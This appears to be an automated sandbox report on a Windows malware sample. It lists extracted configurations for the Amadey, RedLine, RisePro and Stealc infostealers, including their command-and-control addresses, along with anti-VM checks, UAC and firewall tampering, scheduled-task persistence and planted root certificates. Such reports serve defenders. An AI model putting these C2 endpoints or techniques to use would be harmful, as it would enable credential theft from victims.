Analysis
-
max time kernel
61s -
max time network
299s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
05/05/2024, 22:46 UTC
Behavioral task
behavioral1
Sample
98b8a986c223f2cb071b41bdb24d0e577e1e34a0111ce7ed8d12f1d7885ee78e.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
98b8a986c223f2cb071b41bdb24d0e577e1e34a0111ce7ed8d12f1d7885ee78e.exe
Resource
win10-20240404-en
General
-
Target
98b8a986c223f2cb071b41bdb24d0e577e1e34a0111ce7ed8d12f1d7885ee78e.exe
-
Size
1.6MB
-
MD5
257b7b6010eabdb818f58f7da1c4a6e2
-
SHA1
f50aad02b8707f39788d775da1f5ef052476f474
-
SHA256
98b8a986c223f2cb071b41bdb24d0e577e1e34a0111ce7ed8d12f1d7885ee78e
-
SHA512
418c649620243fa46aa172f44481e2980746764c1c9ccd570b5025923703def5d5798d024ed862dec40d24be47a786df73e7cc2700a4061f2ec4fedc8c54cd09
-
SSDEEP
49152:lq8aMhBNUQYV/0AO95+s1YHPexNOH3yPVVzWX6:lq8JhByZV875vUexNc3yPnd
Malware Config
Extracted
amadey
4.20
http://193.233.132.139
-
install_dir
5454e6f062
-
install_file
explorta.exe
-
strings_key
c7a869c5ba1d72480093ec207994e2bf
-
url_paths
/sev56rkm/index.php
Extracted
amadey
4.18
http://193.233.132.56
-
install_dir
09fd851a4f
-
install_file
explorha.exe
-
strings_key
443351145ece4966ded809641c77cfa8
-
url_paths
/Pneh2sXQk0/index.php
Extracted
redline
Test1234
185.215.113.67:26260
Extracted
risepro
147.45.47.93:58709
Extracted
stealc
http://52.143.157.84
-
url_path
/c73eed764cc59dcb.php
Signatures
-
Detect ZGRat V1 3 IoCs
resource yara_rule behavioral1/memory/3428-1056-0x00000000003A0000-0x0000000003C98000-memory.dmp family_zgrat_v1 behavioral1/memory/3428-1084-0x000000001EDF0000-0x000000001EF00000-memory.dmp family_zgrat_v1 behavioral1/memory/3428-1092-0x000000001EBF0000-0x000000001EC14000-memory.dmp family_zgrat_v1 -
Modifies firewall policy service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" z278k3sED2oaPPuKC1qIfUPJ.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 2 IoCs
resource yara_rule behavioral1/files/0x0006000000015cec-112.dat family_redline behavioral1/memory/2872-129-0x0000000000CD0000-0x0000000000D22000-memory.dmp family_redline -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" file300un.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorha.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ f445e8fddd.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ z278k3sED2oaPPuKC1qIfUPJ.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 98b8a986c223f2cb071b41bdb24d0e577e1e34a0111ce7ed8d12f1d7885ee78e.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorta.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ amert.exe -
Modifies boot configuration data using bcdedit 14 IoCs
pid Process 1120 bcdedit.exe 1404 bcdedit.exe 3020 bcdedit.exe 2240 bcdedit.exe 2508 bcdedit.exe 2980 bcdedit.exe 1632 bcdedit.exe 3276 bcdedit.exe 1708 bcdedit.exe 1460 bcdedit.exe 832 bcdedit.exe 2284 bcdedit.exe 3532 bcdedit.exe 3268 bcdedit.exe -
Blocklisted process makes network request 4 IoCs
flow pid Process 256 2004 Xe7EjKVAqAMRHsbNmIAyvjKY.exe 49 2004 Xe7EjKVAqAMRHsbNmIAyvjKY.exe 266 2004 Xe7EjKVAqAMRHsbNmIAyvjKY.exe 269 2004 Xe7EjKVAqAMRHsbNmIAyvjKY.exe -
pid Process 3704 powershell.exe 3152 powershell.exe 4028 powershell.exe 3368 powershell.exe 4072 powershell.exe 1532 powershell.exe 1492 powershell.exe 1652 powershell.EXE 996 powershell.EXE 2004 powershell.exe 3952 powershell.exe 4092 powershell.exe 2828 powershell.exe 992 powershell.exe 3192 powershell.exe 268 powershell.EXE 1788 powershell.exe 2364 powershell.exe -
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 5 IoCs
pid Process 3712 netsh.exe 2892 netsh.exe 916 netsh.exe 2128 netsh.exe 3000 netsh.exe -
Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
-
Checks BIOS information in registry 2 TTPs 12 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 98b8a986c223f2cb071b41bdb24d0e577e1e34a0111ce7ed8d12f1d7885ee78e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 98b8a986c223f2cb071b41bdb24d0e577e1e34a0111ce7ed8d12f1d7885ee78e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorta.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorha.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorha.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion z278k3sED2oaPPuKC1qIfUPJ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion z278k3sED2oaPPuKC1qIfUPJ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorta.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion amert.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion amert.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion f445e8fddd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion f445e8fddd.exe -
Drops startup file 8 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dUxofbRdrBpc7mTkhqw9vgSA.bat regasm.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Phlmm6a8tBttJF8hVJZC6Nik.bat regasm.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\yTq0t2hCa6UCZzbUI3iPWTv3.bat regasm.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lcvAtYvSB2zLbQSOCEjPjlEJ.bat regasm.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UZNr45ofmxHByhUBBoCnF3tP.bat regasm.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tNV2qpVhmZ9SETd5V1xMRoW3.bat regasm.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DnnznnzNU8NeWXFypqcJPdXj.bat regasm.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\POgGcjxyUjKo9eTfflBDRTi1.bat regasm.exe -
Executes dropped EXE 32 IoCs
pid Process 2604 explorta.exe 2760 amert.exe 1256 explorha.exe 2780 swiiiii.exe 1948 f445e8fddd.exe 2872 jok.exe 3008 swiiii.exe 2088 file300un.exe 2572 bcaa5b1d77.exe 2040 gold.exe 2004 Xe7EjKVAqAMRHsbNmIAyvjKY.exe 2852 d0KivyMFNNmcnXIqPmyGk9JJ.exe 2448 jSufjXRDasGbzBaPXI4Wjkit.exe 268 Nll8iSM3Es6hQuUFVGdpDLKp.exe 2100 alexxxxxxxx.exe 3080 qC1NgtgLPRjIDtSFdVkXHXB8.exe 3156 u1jo.0.exe 3680 install.exe 3908 NewB.exe 4000 u1jo.1.exe 2540 z278k3sED2oaPPuKC1qIfUPJ.exe 3544 GameService.exe 1600 GameService.exe 3700 GameService.exe 3724 GameService.exe 3736 GameService.exe 3472 GameSyncLink.exe 3916 449643.exe 1572 Ki9uLqg9jS1UxJFc7oOmpqTm.exe 3664 ISetup8.exe 3272 toolspub1.exe 3756 Install.exe -
Identifies Wine through registry keys 2 TTPs 2 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Wine amert.exe Key opened \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Wine explorha.exe -
Loads dropped DLL 64 IoCs
pid Process 2084 98b8a986c223f2cb071b41bdb24d0e577e1e34a0111ce7ed8d12f1d7885ee78e.exe 2604 explorta.exe 2604 explorta.exe 2760 amert.exe 1256 explorha.exe 632 WerFault.exe 632 WerFault.exe 632 WerFault.exe 632 WerFault.exe 632 WerFault.exe 2604 explorta.exe 1256 explorha.exe 1256 explorha.exe 1256 explorha.exe 2604 explorta.exe 1256 explorha.exe 1256 explorha.exe 888 WerFault.exe 888 WerFault.exe 888 WerFault.exe 888 WerFault.exe 888 WerFault.exe 3036 regasm.exe 3036 regasm.exe 3036 regasm.exe 3036 regasm.exe 3036 regasm.exe 3036 regasm.exe 3036 regasm.exe 1256 explorha.exe 1256 explorha.exe 2400 WerFault.exe 2400 WerFault.exe 2400 WerFault.exe 3036 regasm.exe 3036 regasm.exe 2004 Xe7EjKVAqAMRHsbNmIAyvjKY.exe 2004 Xe7EjKVAqAMRHsbNmIAyvjKY.exe 2004 Xe7EjKVAqAMRHsbNmIAyvjKY.exe 2004 Xe7EjKVAqAMRHsbNmIAyvjKY.exe 3248 rundll32.exe 3248 rundll32.exe 3248 rundll32.exe 3248 rundll32.exe 2400 WerFault.exe 3268 rundll32.exe 3268 rundll32.exe 3268 rundll32.exe 3268 rundll32.exe 1256 explorha.exe 1256 explorha.exe 2004 Xe7EjKVAqAMRHsbNmIAyvjKY.exe 2004 Xe7EjKVAqAMRHsbNmIAyvjKY.exe 2004 Xe7EjKVAqAMRHsbNmIAyvjKY.exe 2004 Xe7EjKVAqAMRHsbNmIAyvjKY.exe 3036 regasm.exe 3208 cmd.exe 3736 GameService.exe 3736 GameService.exe 3472 GameSyncLink.exe 3916 449643.exe 3156 u1jo.0.exe 3156 u1jo.0.exe 3036 regasm.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/memory/2084-2-0x0000000000A10000-0x0000000000F48000-memory.dmp themida behavioral1/memory/2084-7-0x0000000000A10000-0x0000000000F48000-memory.dmp themida behavioral1/memory/2084-6-0x0000000000A10000-0x0000000000F48000-memory.dmp themida behavioral1/memory/2084-4-0x0000000000A10000-0x0000000000F48000-memory.dmp themida behavioral1/memory/2084-5-0x0000000000A10000-0x0000000000F48000-memory.dmp themida behavioral1/memory/2084-3-0x0000000000A10000-0x0000000000F48000-memory.dmp themida behavioral1/memory/2084-0-0x0000000000A10000-0x0000000000F48000-memory.dmp themida behavioral1/memory/2084-1-0x0000000000A10000-0x0000000000F48000-memory.dmp themida behavioral1/files/0x0007000000014701-17.dat themida behavioral1/memory/2604-20-0x0000000000EC0000-0x00000000013F8000-memory.dmp themida behavioral1/memory/2604-23-0x0000000000EC0000-0x00000000013F8000-memory.dmp themida behavioral1/memory/2604-27-0x0000000000EC0000-0x00000000013F8000-memory.dmp themida behavioral1/memory/2604-26-0x0000000000EC0000-0x00000000013F8000-memory.dmp themida behavioral1/memory/2604-24-0x0000000000EC0000-0x00000000013F8000-memory.dmp themida behavioral1/memory/2604-25-0x0000000000EC0000-0x00000000013F8000-memory.dmp themida behavioral1/memory/2604-22-0x0000000000EC0000-0x00000000013F8000-memory.dmp themida behavioral1/memory/2604-21-0x0000000000EC0000-0x00000000013F8000-memory.dmp themida behavioral1/memory/2084-19-0x0000000000A10000-0x0000000000F48000-memory.dmp themida behavioral1/memory/2604-29-0x0000000000EC0000-0x00000000013F8000-memory.dmp themida behavioral1/memory/2604-48-0x0000000004650000-0x0000000004AF3000-memory.dmp themida behavioral1/memory/2604-42-0x0000000000EC0000-0x00000000013F8000-memory.dmp themida behavioral1/files/0x0006000000015c7c-104.dat themida behavioral1/memory/1948-133-0x0000000000010000-0x0000000000690000-memory.dmp themida behavioral1/memory/1948-134-0x0000000000010000-0x0000000000690000-memory.dmp themida behavioral1/memory/1948-137-0x0000000000010000-0x0000000000690000-memory.dmp themida behavioral1/memory/1948-136-0x0000000000010000-0x0000000000690000-memory.dmp themida behavioral1/memory/1948-135-0x0000000000010000-0x0000000000690000-memory.dmp themida behavioral1/memory/1948-132-0x0000000000010000-0x0000000000690000-memory.dmp themida behavioral1/memory/1948-131-0x0000000000010000-0x0000000000690000-memory.dmp themida behavioral1/memory/1948-130-0x0000000000010000-0x0000000000690000-memory.dmp themida behavioral1/memory/1948-128-0x0000000000010000-0x0000000000690000-memory.dmp themida behavioral1/memory/2604-297-0x0000000000EC0000-0x00000000013F8000-memory.dmp themida behavioral1/memory/2540-747-0x0000000140000000-0x0000000140861000-memory.dmp themida behavioral1/memory/1948-746-0x0000000000010000-0x0000000000690000-memory.dmp themida behavioral1/memory/2540-996-0x0000000140000000-0x0000000140861000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Run\f445e8fddd.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000020001\\f445e8fddd.exe" explorta.exe Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Run\bcaa5b1d77.exe = "C:\\Users\\Admin\\1000021002\\bcaa5b1d77.exe" explorta.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" file300un.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA z278k3sED2oaPPuKC1qIfUPJ.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 98b8a986c223f2cb071b41bdb24d0e577e1e34a0111ce7ed8d12f1d7885ee78e.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA explorta.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA f445e8fddd.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA file300un.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 102 drive.google.com 32 pastebin.com 101 drive.google.com -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x0006000000015d6e-196.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
pid Process 2760 amert.exe 1256 explorha.exe 2540 z278k3sED2oaPPuKC1qIfUPJ.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 2780 set thread context of 988 2780 swiiiii.exe 36 PID 3008 set thread context of 1640 3008 swiiii.exe 45 PID 2088 set thread context of 3036 2088 file300un.exe 63 -
Drops file in Program Files directory 14 IoCs
description ioc Process File created C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe install.exe File created C:\Program Files (x86)\GameSyncLink\installc.bat install.exe File opened for modification C:\Program Files (x86)\GameSyncLink\installm.bat install.exe File opened for modification C:\Program Files (x86)\GameSyncLink\GameService.exe install.exe File created C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe install.exe File opened for modification C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe install.exe File created C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe install.exe File opened for modification C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe install.exe File opened for modification C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe install.exe File opened for modification C:\Program Files (x86)\GameSyncLink\installc.bat install.exe File opened for modification C:\Program Files (x86)\GameSyncLink\installg.bat install.exe File created C:\Program Files (x86)\GameSyncLink\installm.bat install.exe File created C:\Program Files (x86)\GameSyncLink\GameService.exe install.exe File created C:\Program Files (x86)\GameSyncLink\installg.bat install.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\Tasks\explorta.job 98b8a986c223f2cb071b41bdb24d0e577e1e34a0111ce7ed8d12f1d7885ee78e.exe File created C:\Windows\Tasks\explorha.job amert.exe -
Launches sc.exe 6 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3680 sc.exe 3588 sc.exe 3528 sc.exe 4032 sc.exe 1812 sc.exe 4036 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 632 2780 WerFault.exe 33 1800 988 WerFault.exe 36 2400 2100 WerFault.exe 70 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u1jo.1.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u1jo.1.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u1jo.1.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString u1jo.0.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 u1jo.0.exe -
Creates scheduled task(s) 1 TTPs 23 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3588 schtasks.exe 3184 schtasks.exe 2940 schtasks.exe 4064 schtasks.exe 356 schtasks.exe 3444 schtasks.exe 1796 schtasks.exe 1228 schtasks.exe 3236 schtasks.exe 2112 schtasks.exe 1456 schtasks.exe 2096 schtasks.exe 3876 schtasks.exe 3500 schtasks.exe 448 schtasks.exe 1120 schtasks.exe 1456 schtasks.exe 276 schtasks.exe 2360 schtasks.exe 576 schtasks.exe 944 schtasks.exe 544 schtasks.exe 2040 schtasks.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 jok.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 jok.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 regasm.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 regasm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 regasm.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 regasm.exe -
Suspicious behavior: EnumeratesProcesses 25 IoCs
